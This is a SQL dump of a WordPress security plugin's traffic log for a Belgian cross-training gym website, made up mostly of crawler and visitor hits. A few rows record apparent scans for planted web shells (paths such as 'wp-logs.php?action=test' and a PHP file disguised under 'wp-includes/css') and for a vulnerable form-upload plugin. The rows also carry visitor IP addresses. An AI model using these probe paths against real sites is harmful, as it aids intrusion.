(72408, 1494560986.039078, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72409, 1494560995.521345, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72410, 1494561000.443419, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72411, 1494561005.910230, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72412, 1494561009.658116, 1753419235, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(72413, 1494567310.770194, 1123638677, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.com/search', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36'),
(72414, 1494567310.893270, 1123638679, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.com/search', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36'),
(72415, 1494567586.928942, 632865533, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72416, 1494567587.589703, 632865533, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72417, 1494567588.092490, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72418, 1494567588.547960, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72419, 1494567588.993342, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72420, 1494567589.548573, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72421, 1494567590.141350, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72422, 1494567590.607366, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72423, 1494567591.081776, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72424, 1494567591.525082, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72425, 1494567591.952558, 632865533, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72426, 1494575289.048164, 632842500, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(72427, 1494576813.610924, 2345094286, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0'),
(72428, 1494577673.346209, 2995861269, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(72429, 1494577675.505409, 2995861269, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(72430, 1494577696.942599, 2995861269, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(72431, 1494579995.416245, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72432, 1494579998.407850, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72433, 1494579998.872631, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72434, 1494579999.314946, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72435, 1494579999.801192, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72436, 1494580000.218578, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72437, 1494580000.636216, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72438, 1494580001.512553, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72439, 1494580001.983810, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72440, 1494580002.388051, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72441, 1494580002.795665, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72442, 1494580003.327017, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72443, 1494580003.736140, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72444, 1494580004.133909, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72445, 1494580925.107442, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72446, 1494581761.601598, 3112277173, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-logs.php?action=test', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72447, 1494583365.679031, 1123631646, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72448, 1494583366.146187, 1123631646, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72449, 1494583369.927155, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72450, 1494585166.379784, 676177697, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72451, 1494585166.394578, 676177697, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72452, 1494587771.645913, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72453, 1494587772.135109, 3652617247, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72454, 1494591924.803893, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/php/', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(72455, 1494593490.144325, 2366145579, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72456, 1494600382.990217, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/modules.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72457, 1494602619.401581, 3024883615, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72458, 1494606005.159250, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(72459, 1494606006.583754, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(72460, 1494606006.633431, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(72461, 1494606007.110949, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(72462, 1494611766.087721, 1123631816, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72463, 1494611767.168857, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72464, 1494611767.592937, 1123631630, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72465, 1494614206.596093, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72466, 1494614505.875136, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72467, 1494615413.002994, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72468, 1494615413.546301, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72469, 1494615413.980213, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72470, 1494615414.405002, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72471, 1494615414.909494, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72472, 1494615415.459743, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72473, 1494615416.147657, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72474, 1494615417.045286, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72475, 1494615417.549332, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72476, 1494615417.980478, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72477, 1494615418.494592, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72478, 1494628175.823785, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72479, 1494629387.420878, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72480, 1494642425.781889, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72481, 1494643397.820787, 3475901849, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72482, 1494643834.504506, 3475901809, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72483, 1494646397.984696, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72484, 1494647531.453429, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/style.css.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72485, 1494650843.136062, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72486, 1494652153.923071, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72487, 1494660353.270285, 1838104422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72488, 1494660353.799679, 1838104422, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72489, 1494660354.261200, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72490, 1494660354.725801, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72491, 1494660355.187490, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72492, 1494660355.690706, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72493, 1494660356.222207, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72494, 1494660356.650380, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72495, 1494660357.081570, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72496, 1494660357.530433, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72497, 1494660357.968063, 1838104422, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72498, 1494670074.460190, 1834541323, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72499, 1494670090.744595, 1834541323, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(72500, 1494672066.689412, 3024883486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72501, 1494674035.077304, 1607842043, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.'),
(72502, 1494674035.921482, 1607842043, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.'),
(72503, 1494674065.942369, 3024883477, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72504, 1494679493.051677, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72505, 1494679536.370166, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72506, 1494679799.833356, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72507, 1494683464.466176, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72508, 1494684600.527319, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72509, 1494685144.659180, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72510, 1494686292.336836, 2366148145, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72511, 1494686292.350135, 2366145567, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72512, 1494686296.669719, 1570674747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(72513, 1494687629.258679, 1358347396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'),
(72514, 1494700861.631042, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(72515, 1494700862.268071, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(72516, 1494703717.811153, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72517, 1494703718.387152, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72518, 1494703718.817380, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72519, 1494703719.311197, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72520, 1494703719.752451, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72521, 1494703720.265617, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72522, 1494703720.823817, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72523, 1494703721.364653, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72524, 1494703721.874278, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72525, 1494703722.372862, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72526, 1494703722.897697, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72527, 1494705888.516158, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72528, 1494705888.980964, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72529, 1494705889.433529, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72530, 1494705889.842302, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
